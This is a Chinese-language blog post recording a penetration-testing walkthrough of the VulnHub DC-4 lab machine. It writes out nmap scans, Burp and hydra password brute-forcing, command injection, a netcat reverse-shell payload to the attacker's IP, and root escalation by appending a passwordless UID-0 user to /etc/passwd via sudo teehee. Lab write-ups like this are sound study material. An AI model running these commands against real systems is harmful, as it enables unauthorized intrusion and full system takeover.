渗透测试学习之DC-4

该文章为本人学习DC-4靶机记录

首先部署靶机:下载地址 DC: 4 ~ VulnHub

步骤为直接下载解压,本文直接省略跳过:

主机发现以及信息搜集

nmap -sS 192.168.88.0/24

 

扫描具体信息

nmap -A -v 192.168.88.137

访问80端口的网站

可以看出该网站的账号大概率为Admin或者admin

尝试使用burpsuite爆破一下

然后设置好字典

 

开始爆破,将结果排序一下,可以看出账号为admin,密码happy

登录网站

 

点击command

 

 

看一下bp抓到的包,可以发现可以修改radio的参数来改变命令

首先看看flag,去home目录

似乎不可以直接去,尝试一下getshell

 

 

 

 尝试一下写入一句话木马脚本,似乎被过滤掉了

尝试直接使用shell反弹,我看剑很多人用加号代替空格,其实直接使用空格也可以

 payload:nc -nv 192.168.88.129 6666 -e /bin/bash

 

 使用交互式界面

python -c "import pty; pty.spawn('/bin/bash')"

 查看flag可以知道提示去home的目录看一下,可以看见jim有一个旧的密码本

 

 尝试ssh爆破

hydra -l jim -P pass2.txt ssh://192.168.88.137

爆出成功,使用ssh远程登陆一下,一登陆发现最后一句话 you have mail

ssh jim@192.168.88.137

去/var/mail查看jim的邮件

 切换到chales角色

 

 sudo -l 发现有teehee权限

 尝试网上大佬的teehee提权方式,在passwd文件里写入一个无密码的新用户

echo "jl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

 然后就是和其他的靶机一样到root目录找flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值